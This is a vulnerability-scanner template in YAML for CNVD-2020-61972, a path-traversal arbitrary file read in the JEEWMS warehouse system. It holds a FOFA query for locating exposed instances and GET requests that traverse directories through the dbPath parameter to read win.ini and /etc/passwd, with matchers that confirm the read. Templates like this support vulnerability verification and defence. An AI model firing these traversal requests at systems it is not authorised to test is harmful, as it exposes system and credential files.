id: CNVD-2020-61972

info:
  name: jeewms CNVD-2020-61972 read-file
  author: qwtd
  severity: high
  verified: true
  description: |
    fofa body="plug-in/lhgDialog/lhgdialog.min.js"

rules:
  windows:
    request:
      method: GET
      path: /systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini
    expression: response.status == 200 && response.body.bcontains(b'extensions')
  linux:
    request:
      method: GET
      path: /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: windows() || linux()